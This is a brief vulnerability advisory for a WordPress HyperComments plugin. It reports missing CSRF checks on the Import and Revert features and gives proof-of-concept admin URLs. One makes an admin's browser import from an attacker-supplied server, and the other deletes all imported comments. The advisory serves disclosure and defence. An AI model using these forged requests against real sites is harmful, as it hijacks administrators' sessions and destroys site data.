The plugin does not have CSRF checks in the Import and Revert HyperComments features, allowing attackers to make logged in admin perform such actions via a CSRF attack
Go to https://example.com/wordpress/wp-admin/admin.php?r=import%2Fhypercomments&url=http://<your_server>, and you will see a get request in your server logs indicating that the import request is done.
To revert the imports (ie delete all imported comments): https://example.com/wp-admin/admin.php?r=import%2Fhypercomments&revert=1
https://www.youtube.com/watch?v=75BH2m8cmPo